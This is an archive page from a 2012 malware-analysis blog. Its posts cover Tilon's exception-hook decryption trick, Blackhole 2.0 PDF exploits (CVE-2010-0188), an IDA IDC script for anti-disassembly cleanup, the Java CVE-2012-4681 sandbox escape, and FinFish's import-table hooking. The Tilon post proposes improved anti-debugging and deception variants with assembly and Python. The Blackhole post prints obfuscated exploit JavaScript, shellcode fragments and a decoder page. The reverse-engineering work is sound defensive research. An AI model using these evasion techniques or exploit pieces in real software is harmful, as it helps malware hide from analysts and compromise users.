Scrammed!: 2012

Thursday, October 25, 2012

Tricky Tilon: disappearing instruction, anti-debugging, deceptions and much more!

Introduction

This post is about a sort of anti-debugging trick that I discovered while analyzing a malware named Tilon. Well, to be precise, it's more a deception trick than an anti-debugging one but, as we will see later, it's really easy to tweak it to tamper with debugging.

Tilon is a banker that was spotted by Trusteer in July 2012. Aside from some pretty standard stuff, like a Man In The Browser implementation, it's best known for using several evasion techniques. While digging deeper into its various encryption/packer layers, I found one that hasn't been reported yet.

All the layers are very easy to bypass: they roughly consist of basic crypto operations and UPX compression. After solving them you will see the following listing:

...

008D0079 CALL 008D0233
008D007E CALL 008D04DC
008D0083 POPAD
008D0084 ADD ESP,4
008D0087 MOV EAX,DWORD PTR SS:[EBP+4020BF]
008D008D JMP EAX

Tilon's trick(s)

So, we have two CALL and one JMP.

If we step into the first call, we notice that the malware sets a "hook" (it's not proper API hooking, as it only works inside the process itself) on the KiUserExceptionDispatcher API (an NTDLL.dll function that is called when certain types of exception occur), so that it calls what we will discover to be a decryption routine.

Pay attention to the code while stepping... As I mentioned before, Tilon is famous for the number of deception tricks it implements!
For example, the next call makes use of a well-known PEB-related anti-debugging trick:

008D04DC MOV EAX,DWORD PTR FS:[18]
008D04E2 MOV EAX,DWORD PTR DS:[EAX+30]
008D04E5 MOVZX EAX,BYTE PTR DS:[EAX+2]
008D04E9 TEST EAX,EAX
008D04EB JNZ SHORT 008D04EE
008D04ED RETN
008D04EE INT3
...

Finally, there is a jump that brings us to an encrypted code:

Access violation, indeed!
Since there is no exception handler installed, an analyst may think that the code has crashed for some reason they missed, and restart the debugger to conduct a more careful analysis. On the other hand, if we use Shift+F8 the malware will decrypt the code thanks to the previous "hook"! Finally, it will also remove the "hook" from the KiUserExceptionDispatcher API and jump to the decrypted bytes.

So, this is really not an anti-debugging trick, even if it will work fine in some cases, like against emulators, but, let's stay focused: our goal is to fool the debugger... How can we do it? Well, there are surely several ways to do that, the one I have in mind consists of mixing this trick, the PEB one and... one more finding!

Let me explain it briefly: when Tilon generates the exception, by pressing Shift+F8 the debugger will execute the first instruction of the "hook", but will break only on the second one.
Thus we have:

7C91EAEC 68 FA028D00 PUSH 8D02FA ; the first instruction is executed...
7C91EAF1 C3 RETN ; but the debugger will break only here!

That gives us the possibility of hiding an instruction!

Putting the pieces together:

Tilon: you are doing it wrong...!

Now I will show you one way to improve the trick in the Tilon's code:

STEP 1. We need to replace the decryption key with a wrong one and to set a global variable (for instance, 008D0AB0) containing the address of the decryption routine (in my case 008D02FA).

STEP 2. We modify the hook by writing: JMP [008D0AB0] (this instruction will be hidden).

STEP 3. We modify the PEB trick (inside the last call before the jump to the encrypted bytes; see the listing at the beginning of this blog-entry) in the following way:

008D0A00 MOV EAX,DWORD PTR FS:[18]
008D0A06 MOV EAX,DWORD PTR DS:[EAX+30]
008D0A09 MOVZX EAX,BYTE PTR DS:[EAX+2]
008D0A0D JNZ SHORT 008D0A19
008D0A0F MOV DWORD PTR DS:[8D0AB0], 8D0A1A ; no debugger!
008D0A19 RETN
008D0A1A MOV BYTE PTR DS:[8D036D],7A ; small snippet in case of no debugger
008D0A21 JMP 008D02FA
008D0A26 ADD BYTE PTR DS:[EAX],AL

When the code jumps to the encrypted bytes, the exception will invoke the "hooked" KiUserExceptionDispatcher API, which:

will jump directly to 008D02FA (the decryption routine), using the wrong key, if the debugger is detected;
will jump to the small snippet in the listing above, which restores the correct decryption key and then jumps to 008D02FA, otherwise.

In this way, if an analyst doesn't notice the PEB control (stepping over its call, for instance), the bytes won't be decrypted in the right way and this will cause a crash.
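
The three steps can be modelled in a few lines of Python. This is only a toy sketch under loud assumptions: the real layers use crypto operations that are not detailed here, so a single-byte XOR stands in for them; the Loader class and its method names are hypothetical; 0x13 is an arbitrary decoy key, while 0x7A is the byte that the snippet above writes back.

```python
CORRECT_KEY = 0x7A  # byte restored by the "no debugger" snippet in the listing
WRONG_KEY = 0x13    # hypothetical decoy key (assumption, not from the sample)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Stand-in for the real decryption routine (assumed single-byte XOR)."""
    return bytes(b ^ key for b in data)


class Loader:
    """Toy model of the modified loader; all names are illustrative."""

    def __init__(self, payload: bytes):
        self.encrypted = xor_bytes(payload, CORRECT_KEY)
        self.key = WRONG_KEY        # STEP 1: the wrong key is in place
        self.target = self.decrypt  # STEP 1: global variable -> decryption routine

    def peb_check(self, being_debugged: bool) -> None:
        # STEP 3: only a clean run redirects the global to the small snippet
        if not being_debugged:
            self.target = self.restore_key_then_decrypt

    def restore_key_then_decrypt(self) -> bytes:
        self.key = CORRECT_KEY
        return self.decrypt()

    def decrypt(self) -> bytes:
        return xor_bytes(self.encrypted, self.key)

    def on_exception(self) -> bytes:
        # STEP 2: the hidden "JMP [global]" placed in the hooked dispatcher
        return self.target()
```

Calling peb_check(False) before on_exception() yields the original payload, while peb_check(True) leaves the decoy key in place and produces garbage.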

In my opinion, this version of the trick is way better than Tilon's original implementation, but we can improve it much more if we choose not to consider how it was originally structured (that is strongly related to the exception caused by the execution of the encrypted bytes...).

Another way to implement the trick (my fav one ;))

Another variant of Tilon's original implementation of the trick is the following.

We have to set a global variable (let's say 00BD0AB0) that contains a memory address, depending on the result of the PEB anti-debugging trick. Then, we need to generate an appropriate exception (for example, by dereferencing a null pointer) and to "hook" the KiUserExceptionDispatcher API by injecting a JMP [00BD0AB0] (the hidden instruction!).
Thus, we have something like:

...
mov eax, 0
mov [eax], 0
* junk code *
...

The idea is to use the PEB check to set the global variable 00BD0AB0 to the address of * junk code * if the debugger is detected, and to set it to the right address (where the real code is) otherwise. In this way, the analyst may not notice the "hook" at all, and will use Shift+F8 to continue debugging from the instruction right after the exception.

The following diagram will clarify the procedure:

Of course you can choose a different (more subtle and less visible) way to generate the exception, but the point is that you can really confuse the analysis using the * junk code *, and this can be really time-consuming from the analyst's perspective. For instance, you can insert some junk code and then terminate the process, or anything else.

Moreover, it's less detectable than setting the jump directly in the PEB check, because of the hidden instruction and the fact that the debugging will continue its execution after the exception itself like you would normally expect.

Note also that the PEB check is only one of the possible tricks to detect the debugger and you can obviously choose a different one!

Conclusion

You can use this technique on its own, or mix it with other tricks. If you choose to combine different tricks together, the risk of being detected will increase... but so will the number of possible uses you can make!

Thursday, October 11, 2012

Some notes about the pdf exploits in Blackhole 2.0

Recently we have been hearing a lot about Blackhole 2.0, the latest edition of the popular exploit kit, and so I started looking around to gather some more information. In particular, I searched for some websites hosting it and found a pdf file that caught my attention (you can find it in <blackhole_host>/data/t.pdf).

The curious thing about it is that it doesn't contain any malicious code and if we look closer we understand that it's only a sort of skeleton for the real malicious pdf.

In fact, just analyzing the raw bytes we see the following streams:

3 0 obj<<%data%/CreationDate(%title%)>>

endobj

42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream

%config%

endstream

endobj

43 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream

%js%

endstream

endobj

This suggests that the malicious pdf may be built at runtime: it seems that the fields %data%, %title%, %config% and %js% are filled each time with data related to a different exploit, depending on the vulnerability found on the victim's system. Moreover, this is a novelty for the Blackhole exploit kit, as the previous versions didn't make use of a similar approach.

So, I conducted further investigations, searched for some live exploit urls to perform a real infection and take a log with WireShark. I then extracted the pdf file from it and started analyzing it.

To do that I used a utility named PDFStreamDumper, which successfully decompresses the streams (note that some other alternatives, such as pdftk, failed at this, maybe because the file was intentionally corrupted in order to make the inspection more difficult).

The important streams are the same as the ones listed above, but in this case they are filled with some data (they are reported in a slightly different notation because I had to decompress them). Here they are, together with a brief explanation:

/Keywords(3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21)/CreationDate(6683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5… **SHELLCODE BYTES** ...6363636d7477723d3033303333333034333430383335333830393035266c71786d746e66623d30332668657a6e647865663d746c796d6626717666707870656f3d75777462730000)

This stream contains both the encrypted javascript exploit and the shellcode.

<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/"><trace><area level="1" name="font"></area></trace><agent name="designer"><destination>pdf</destination><pdf><fontInfo></fontInfo></pdf></agent><present><pdf><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf><xdp><packets>*</packets></xdp><destination>pdf</destination></present><acrobat><acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7><common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common></acrobat></config>

This stream contains some xml data.

<template><subform layout="tb" locale="ru_RU" name="form1"><pageSet><pageArea id="Page1" name="Page1"><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet><subform h="10.5in" w="8in"><field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm"><ui><imageEdit></imageEdit></ui><caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption><border xmlns="http://www.xfa.org/schema/xfa-template/2.2/"><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border><event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">

<xfa:script contentType='application/x-javascript'>

with(event){

k=target[/**/"eval"];

if((app.addMenuItem+/**/"").indexOf(/**/'native')!=-1){a=/**/target.keywords;}

}

s="";

z=a;

/**/ss/**/=/**/String.fromCharCode/**/;

for(i=0;i<a.length;i+=2){

s=s.concat(ss(parseInt(z[i]+z[1+i],0x1d)));

}

k(s);

</xfa:script></event></field></subform><proto></proto></subform><?templateDesigner DefaultLanguage FormCalc?><?templateDesigner DefaultRunAt client?><?templateDesigner Grid show:1, snap:1, units:0, color:ff8080, origin:(0,0), interval:(125000,125000)?><?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?><?templateDesigner Zoom 76?></template>

This stream contains the script that decrypts the exploit itself.

To decrypt the exploit, you can use the following html page ("z" contains the encrypted bytes):

<html>

<head>

<title>Decrypted Exploit</title>

</head>

<body>

<script>

var z;

var s;

z = "3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e1h3r3e3p3l3a3c3e1b1i1f1i3g1f1a1a1c21423a3r133p3a3d3d3i3n3g21423a3r133b3b3b1f13… **ENCRYPTED EXPLOIT BYTES** …383j1l1b383l3l1l1c21433i403h1b473k20383l3l1m491c382f1j1b3k1c212f3m3a3g3e2c3i3e3l3d1k1h3r3a432s3a3l413e23383l3l1k49383j1m1b1c21";

s = "";

for(i=0; i < z.length; i+=2)

{

document.write(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)));

if(String.fromCharCode(parseInt(z[i]+z[1+i], 0x1d)) == ';' )

document.write("<br/>");

}

</script>

</body>

</html>

Which leads to the following well known vulnerability (CVE-2010-0188):

*REMOVED*

…

_j8='SUkqADggAABB'; // * base64 representation of a TIFF header! *

_j9=_I2('QUFB',10984);

_ll0='QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';

_ll1=_j8+_j9+_ll0+_j5;

_ll2=_ji1(_j7,'');

if(_ll2.length%2)_ll2+=unescape('');

_ll3=_j2(_ll2);

with(

{

k:_ll3

}

)_I0(k);

ImageField1.rawValue=_ll1

…

*REMOVED*
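
The comment about the TIFF header is easy to check outside the pdf. The following is a minimal Python sketch that decodes the _j8 string from the listing and unpacks the first eight bytes as a classic TIFF header (byte order, magic number, offset of the first IFD); the variable names are mine.

```python
import base64
import struct

# _j8 from the listing above, decoded from base64
header = base64.b64decode("SUkqADggAABB")

# Classic TIFF header: 2-byte byte order, 16-bit magic (42), 32-bit IFD offset.
# "II" means little-endian, hence the "<" in the format string.
byte_order, magic, ifd_offset = struct.unpack_from("<2sHI", header, 0)

print(byte_order, magic, hex(ifd_offset))
```

The byte order comes out as "II" (little-endian) and the magic number as 42, which is what a TIFF parser expects to find at the start of the image data assigned to ImageField1.rawValue.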

I also gathered some other malicious pdf files and found that they are always structured in the same way: the decryption script may change a little (for example, I found "0x1C" instead of "0x1D" as the numerical base used to interpret the bytes), but the method itself is very similar.
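
Since only the base seems to change between samples, the decoding step can be sketched as a small Python function that takes the base as a parameter. This mirrors the parseInt(z[i]+z[1+i], 0x1d) loop of the embedded script; the function name decode_pairs is mine, and the assumption is that every sample keeps the two-characters-per-byte layout.

```python
def decode_pairs(encoded: str, base: int = 0x1D) -> str:
    """Decode a string in which every two characters are one number in `base`."""
    chars = []
    # A trailing odd character, if any, is ignored
    for i in range(0, len(encoded) - 1, 2):
        chars.append(chr(int(encoded[i:i + 2], base)))
    return "".join(chars)


# First pairs of the /Keywords stream shown earlier
prefix = "3a3p3p1h3a3l3e3r40233e423e3n401h403a3r3g3e401h3c3r3e3a403i3o3n2a3a403e"
print(decode_pairs(prefix))  # app.alert=event.target.creationDate
```

For a sample that uses the other base, the call simply becomes decode_pairs(data, 0x1C).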

Saturday, September 29, 2012

Cleaning off anti-disassembly code: the IDC way.

Any code that can be executed can also be reversed. However, there are some tricks that make this task more time-consuming, more intricate, and harder to turn into an automated analysis.

What's the problem? A sequence of executable code can be disassembled in many different ways, so disassemblers have to use some heuristics that, by their nature, are subject to limitations. Anti-disassembly techniques take advantage of them!

When executable code is disassembled, each byte of it occurs in the representation of one, and only one, instruction at a time. So, if the disassembler is forced to build an instruction starting from the wrong offset, the instruction it shows won't match the one being executed.

In this article I will discuss one of these tricks. The trick itself is not really a big deal as it's a well known one, but I found it to be very annoying as I had to deal with it recently, in the attempt of reversing a malware. For this reason, I decided to automate the task of cleaning off the code and developed a little IDC script, based on some assumptions I'm going to explain.

Let's consider a code in the following form:

call loc_40106A

401050: db 'string01', 0

40106A: * assembly instructions *
......: .....

It will be disassembled as:

call loc_401050+0A

401050: * assembly instructions corresponding to the string interpreted as a code *

40106A: * assembly instructions *
......: .....

(This is an approximate representation: note that the bytes of the string interpreted as opcodes may unalign the instruction at 40106A)

The idea behind the trick is very simple: IDA is unable to distinguish between text and code and makes wrong assumptions while disassembling the executable. In particular, IDA doesn't realize that, following the control-flow, the bytes it interpreted as code (right after the call instruction) are never executed and, thus, they are only text.

Moreover, it is very disturbing from the analyst perspective as it basically hides strings, making it useless to search for them, and also results in some weird disassembled instructions, that complicate the listing.

So, what's the idea to clean off the code?

First, we have to search for a near relative call, which corresponds to the "E8" opcode, and we assume that its operand, that is the following 4 bytes, will have a value between 1 and 100.

Once we find such a situation, we undefine the bytes of code corresponding to the string with "MakeUnknown", and then we use "MakeStr" to recompose the original string correctly.
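
Outside IDA, the detection step alone can be sketched in Python on the raw bytes. This is a rough illustration under the same assumption (an E8 opcode whose 4-byte operand is small is a call that jumps over an inline string); the function name and the bounds are mine, and the sample bytes are the ones from the "identity" example discussed in this post.

```python
import struct


def find_calls_over_strings(code: bytes, base: int, min_size: int = 2, max_size: int = 99):
    """Return (call address, inline bytes, call target) for each E8 call
    whose little-endian 32-bit operand lies between min_size and max_size."""
    hits = []
    i = 0
    while i + 5 <= len(code):
        if code[i] == 0xE8:
            (size,) = struct.unpack_from("<I", code, i + 1)
            if min_size <= size <= max_size and i + 5 + size <= len(code):
                inline = code[i + 5:i + 5 + size]
                hits.append((base + i, inline, base + i + 5 + size))
                i += 5 + size  # resume scanning at the call target
                continue
        i += 1
    return hits


sample = bytes.fromhex(
    "E8 09 00 00 00 69 64 65 6E 74 69 74 79 00"
    " 57 8D 83 8D 28 40 00 FF D0 83 C7 08 2B CF"
)
for address, inline, target in find_calls_over_strings(sample, 0x403E2A):
    print(hex(address), inline, hex(target))
```

On the sample bytes it reports the call at 0x403E2A, the inline string "identity" with its terminating zero, and 0x403E38 as the real call target.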

Unfortunately, even if this procedure solves most of the cases, it isn't general enough to solve all of them.

Let's consider the following example:

seg000:00403E2A E8 09 00 00 00 call near ptr loc_403E37+1

seg000:00403E2F 69 64 65 6E 74 69 74 79 imul esp, [ebp+6Eh], 79746974h

seg000:00403E37 loc_403E37:

seg000:00403E37 00 57 8D add [edi-73h], dl

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

After the procedure described above, it will become:

seg000:00403E2A E8 09 00 00 00 call near ptr unk_403E38

seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0

seg000:00403E38 57 unk_403E38 db 57h

seg000:00403E39 8D db 8Dh

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

As you can see, IDA has also undefined some bytes after the string (which should have been legitimate assembly instructions); so, to solve the problem, we may think to go at the end of it and reconvert everything in code, using "MakeCode". But is that enough?

seg000:00403E2A E8 09 00 00 00 call loc_403E38

seg000:00403E2F 69 64 65 6E 74 69 74 79+aIdentity db 'identity',0

seg000:00403E38

seg000:00403E38 loc_403E38:

seg000:00403E38 57 push edi

seg000:00403E39 8D db 8Dh

seg000:00403E3A 83 8D 28 40 00 FF D0 or dword ptr [ebp-0FFBFD8h], 0FFFFFFD0h

seg000:00403E41 83 C7 08 add edi, 8

seg000:00403E44 2B CF sub ecx, edi

No, it isn't! IDA tries to convert the bytes into code, but if they are unaligned it might do that starting from the wrong offset or even fail to complete the task. This happens because IDA originally disassembled the string bytes as code, which led to the disassembly of the following bytes in incorrect instructions like the above "or dword ptr [ebp-0FFBFD8h]". Because of this, when you try to realign the code, and assemble the correct instruction starting from the byte "8D", IDA fails because the opcode "8D" needs to take the bytes from the "or" instruction, and IDA won't break an instruction that already exists.

Even undefining some of the bytes after the string and then trying to translate them back into code doesn't work because, by the nature of the problem, you don't know exactly how many bytes you should consider. You can use a heuristic and try with about ten bytes, but this solution doesn't always give accurate results. Moreover, if there's another call in those ten bytes, things get even worse!

The basic idea to try to solve the problem is to manually parse the raw bytes. I wrote a little IDC script to do that; here is a brief explanation of how it works:

It searches for the "0xE8" byte and takes its operand, that is the size of the string.

It undefines the subsequent "size" bytes and recomposes them as a string.

Then, it iterates the following procedure:

1. It tries to undefine a byte and to make an instruction from it (after the first execution of this step, the undefining operation won't have any effect when coming from step 3).

2. If the instruction is made, go back to step 1 and continue with the bytes after the instruction.

3. If the instruction wasn't made, undefine one more byte (to a maximum of 16), in an attempt to make it, and repeat from step 1.

In this way, only one byte at a time is undefined and so is the building of the corresponding instruction, whenever possible.

I also assumed that if there are four subsequent instructions that are already interpreted as code, then the bytes are aligned and the work is done. Finally, if any of the recomposed instructions is a call, the algorithm will start over again.

Here is the final script (change "MIN" and "MAX" with the addresses that define the range of the code in which you want to run the script - e.g. MIN = 0x00401000, MAX = 0x00404FFF):

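auto i, j;
auto Size;
auto Delta, DeltaTemp, DeltaUndef;

for(i = MIN; i < MAX; i++)
{
    // look for the E8 opcode (call with a 4-byte relative operand)
    if(Byte(i) == 0xE8)
    {
        // the operand is the distance to the call target, i.e. the string size
        Size = Dword(i + 1);
        if(Size > 1 && Size < 100)
        {
            Message(" %08x \n ", i);
            // undefine the bytes after the call and rebuild the string
            MakeUnknown(i+5, Size, DOUNK_DELNAMES);
            MakeStr(i+5, i+5+Size);
            Delta = 0;
            DeltaUndef = 0;
            // realign the code that follows the string
            for(j = 0; j < 4; j++)
            {
                // another call: stop here and leave it to the outer loop
                if(Byte(i+5+Size + Delta) == 0xE8)
                {
                    break;
                }
                MakeUnknown(i+5+Size + Delta, 1, DOUNK_DELNAMES);
                DeltaTemp = MakeCode(i+5+Size + Delta);
                if(DeltaTemp != 0)
                {
                    // instruction made: move past it
                    Delta = Delta + DeltaTemp;
                    DeltaUndef = 0;
                }
                else
                {
                    // instruction not made: undefine one more byte and retry
                    j = 0;
                    DeltaUndef++;
                    if(DeltaUndef > 16)
                    {
                        break;
                    }
                    if(Byte(i+5+Size + Delta + DeltaUndef) == 0xE8)
                    {
                        break;
                    }
                    MakeUnknown(i+5+Size + Delta + DeltaUndef, 1, DOUNK_DELNAMES);
                    Message("-- Undef %08x \n", i+5+Size + Delta + DeltaUndef);
                }
            }
        }
    }
}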

P.S. I know the code looks twisty and more complicated than it needs to be, but I had to write it this way to bypass some glitches I was having with a couple of IDC APIs.

Monday, August 27, 2012

Analysing CVE-2012-4681 (latest Java 0day)

Yesterday I spotted the news about a new Java 0day being exploited in the wild and soon after a POC was released: http://pastie.org/4594319.
I decided to analyse this code to understand what is the vulnerability that triggers the exploit. Here is a brief description of my findings.

The code instantiates a Statement object that will be used to run the setSecurityManager() method of the System class. The purpose is to set the Security Manager to null, which means escaping the Java sandbox. Of course, you can't do this directly and here comes the exploit!

The Statement object contains a field named "acc", which is an AccessControlContext (a sort of security descriptor) that specifies the permissions allowed for the Statement object itself. This field is normally not accessible from code outside the Statement class, so the exploit needs to find a way to modify it.

It does so by using the getField() method of the sun.awt.SunToolkit object: this function returns a given field from a given object; in this case it returns Statement.acc. At this point the game is over because the malicious code can just create a new AccessControlContext object, assign to it full permissions and then replace the old restricted Statement.acc with the new unrestricted one.

Mystery solved? Not yet: the tricky part is in obtaining a reference to sun.awt.SunToolkit, which is supposed to belong to a restricted package. The exploit does this by calling Class.forName(); this method simply returns the Class object that corresponds to a given name.

This is how I understand the code (and I'm no Java expert), but I read this blog entry that has a slightly different explanation. In their analysis, the authors see another method that accomplishes the task: com.sun.beans.finder.ClassFinder.
I don't know what this is about: do they have a different POC or sample? It does seem so!

Also they say that the exploit itself relies on the possibility of instantiating the sun.awt.SunToolkit object through the com.sun.beans.finder.ClassFinder object. This would mean that in the POC I have analysed the vulnerability is in the Class.forName() method, that is, there are TWO different vulnerabilities (one in ClassFinder and one in Class.forName()).

However, when I debugged the exploit in Java version 1.6 (jre6) it did not work: the Class.forName() call successfully returned the sun.awt.SunToolkit object, but then the use of its getField() method threw an exception. Instead, the method works fine in version 1.7 (jre7). To make it short:

So, even if version 1.6 allows the instantiation of the sun.awt.SunToolkit object, it prevents it from accessing the private Statement.acc field, which seems correct. It seems that the bug is really in version 1.7, in the access to Statement.acc. Or maybe neither of the two is supposed to happen: sun.awt.SunToolkit must not be obtainable by restricted code, and the Statement.acc field must not be accessible to anyone.

I will look forward to new results.

*UPDATE* [28 August 2012]
1) Now we can refer to the above vulnerability as "CVE-2012-4681".
2) A new analysis, based on the same POC I documented, has been published today: http://thexploit.com/sec/java-facepalm-suntoolkit-getfield-vulnerability/ . So, yes, it seems that getField() is the culprit, or at least it's one of them...

*UPDATE 2* [28 August 2012]
A more in-depth analysis is finally out: http://immunityproducts.blogspot.com.ar/2012/08/java-0day-analysis-cve-2012-4681.html
As I thought, there are two different 0days: one that allows you to get a reference to the restricted class sun.awt.SunToolkit, and the other one (getField()) that lets you access a private field of a class. The missing detail (classFinder()) is also solved: it is used in the internal implementation of the execute() method of the Expression object.

Friday, August 17, 2012

FinFish's trick... not so legendary!

This post is about a trick that Finfish uses to appear (well, at least, "to try to appear"!) as a normal, non malicious program.
First of all you can immediately notice that this sample is a simple loader: you can have a look at the IDA navigation bar to spot a tiny code section in contrast to a huge resource section.

This tells us that something is hidden somewhere in the resources. The payloads, in fact, are encrypted and stored in the dialog type resources. Here's a quick verification test, that shows that something is wrong in the dialog data:

But let's go back to the curious trick we mentioned, and let's begin by analyzing the code. If we start looking from the entry point we notice... absolutely nothing!
At a first glance nothing suggests that we are analyzing a malware, as we only go through some common APIs.

Of course, a deeper reading reveals the trick: in the middle of some legitimate calls we find a suspicious function. What caught my attention most is that it calls the VirtualProtect API several times, apparently without any good reason, as we will see later.

For now let's start from the beginning:

.text:004011F5 push 0 ; lpModuleName
.text:004011F7 call ds:GetModuleHandleW
.text:004011FD mov ebp, eax ; MZ header
.text:004011FF mov eax, [ebp+3Ch] ; MZ.e_lfanew = PE offset
.text:00401202 mov esi, [eax+ebp+80h] ; import table RVA
.text:00401209 mov eax, [esi+ebp+0Ch] ; import name RVA

This code gets the handle of the application itself and then it reads: the MZ header; the PE offset; the import table RVA; the first import name RVA.
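
The same walk over the headers can be reproduced in Python with the struct module. This is a minimal sketch, assuming a 32-bit PE image laid out as it is in memory (so that RVAs can be used directly as offsets into the buffer, just as the code above adds them to the module base); the function names and the toy image are mine.

```python
import struct


def u32(image: bytes, offset: int) -> int:
    """Read a little-endian 32-bit value."""
    return struct.unpack_from("<I", image, offset)[0]


def first_import_name(image: bytes) -> str:
    pe_offset = u32(image, 0x3C)               # MZ.e_lfanew
    import_rva = u32(image, pe_offset + 0x80)  # import table RVA (PE32 layout)
    name_rva = u32(image, import_rva + 0x0C)   # IMAGE_IMPORT_DESCRIPTOR.Name
    end = image.index(b"\x00", name_rva)
    return image[name_rva:end].decode("ascii")


def build_toy_image() -> bytes:
    """Build a tiny fake image containing only the fields read above."""
    image = bytearray(0x400)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)            # e_lfanew
    image[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<I", image, 0x80 + 0x80, 0x200)    # import table RVA
    struct.pack_into("<I", image, 0x200 + 0x0C, 0x300)   # first import name RVA
    image[0x300:0x30B] = b"user32.dll\x00"
    return bytes(image)


print(first_import_name(build_toy_image()))
```

The 0x80 offset is the one used by the listing: 4 bytes of PE signature, 20 bytes of file header and 96 bytes of optional header precede the data directories, and the import directory is the second entry.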

.text:0040120D add esi, ebp ; virtual address of the image import descriptor
...
.text:00401223 add eax, ebp
.text:00401225 push offset aUser32_dll_0 ; "user32.dll"
.text:0040122A push eax ; char *
.text:0040122B call __stricmp
.text:00401230 add esp, 8
...
.text:00401237 add esi, 14h
.text:0040123A mov [esp+18h+var_4], esi
.text:0040123E jmp loc_4012E6
...
.text:004012E6 mov eax, [esi+0Ch]
.text:004012E9 test eax, eax
.text:004012EB jnz loc_401223

Then the malware calculates the virtual addresses of the first image import descriptor, its import name address, and begins a loop over the import names looking for "user32.dll".

.text:00401243 mov edi, [esi]
.text:00401245 mov esi, [esi+10h]
.text:00401248 mov eax, [edi+ebp]
.text:0040124B add edi, ebp
.text:0040124D add esi, ebp
...
.text:00401257 jmp short loc_401260
...
.text:00401260 lea ecx, [eax+ebp+2] ; Name
.text:00401264 push offset aRegisterclasse ; "RegisterClassExW"
.text:00401269 push ecx ; char *
.text:0040126A call __stricmp
.text:0040126F add esp, 8
.text:00401272 test eax, eax
.text:00401274 jnz short loc_401297
...
.text:00401297 mov edx, [edi]
.text:00401299 lea eax, [edx+ebp+2]
.text:0040129D push offset aCreatewindowex ; "CreateWindowExW"
.text:004012A2 push eax ; char *
.text:004012A3 call __stricmp
.text:004012A8 add esp, 8
.text:004012AB test eax, eax
.text:004012AD jnz short loc_4012D0
...
.text:004012D0 mov eax, [edi+4]
.text:004012D3 add edi, 4
.text:004012D6 add esi, 4
.text:004012D9 test eax, eax
.text:004012DB jnz short loc_401260

Here the code saves the content of the OriginalFirstThunk and the FirstThunk fields of the IMAGE_IMPORT_DESCRIPTOR. Then, it loops over every IMAGE_IMPORT_BY_NAME.Name looking for the RegisterClassExW and the CreateWindowExW APIs.

Once they are found it does the following:

[RegisterClassExW]

.text:00401276 lea edx, [esp+18h+flOldProtect]
.text:0040127A push edx ; lpflOldProtect
.text:0040127B push 40h ; flNewProtect
.text:0040127D push 4 ; dwSize
.text:0040127F push esi ; lpAddress
.text:00401280 call ebx ; VirtualProtect
.text:00401282 lea eax, [esp+18h+flOldProtect]
.text:00401286 push eax ; lpflOldProtect
.text:00401287 mov dword ptr [esi], offset BadFunc1 ; FirstThunk overwrite
.text:0040128D mov ecx, [esp+1Ch+flOldProtect]
.text:00401291 push ecx ; flNewProtect
.text:00401292 push 4 ; dwSize
.text:00401294 push esi ; lpAddress
.text:00401295 call ebx ; VirtualProtect

[CreateWindowExW]

.text:004012AF lea ecx, [esp+18h+flOldProtect]
.text:004012B3 push ecx ; lpflOldProtect
.text:004012B4 push 40h ; flNewProtect
.text:004012B6 push 4 ; dwSize
.text:004012B8 push esi ; lpAddress
.text:004012B9 call ebx ; VirtualProtect
.text:004012BB lea edx, [esp+18h+flOldProtect]
.text:004012BF push edx ; lpflOldProtect
.text:004012C0 mov dword ptr [esi], offset BadFunc2 ; FirstThunk overwrite
.text:004012C6 mov eax, [esp+1Ch+flOldProtect]
.text:004012CA push eax ; flNewProtect
.text:004012CB push 4 ; dwSize
.text:004012CD push esi ; lpAddress
.text:004012CE call ebx ; VirtualProtect

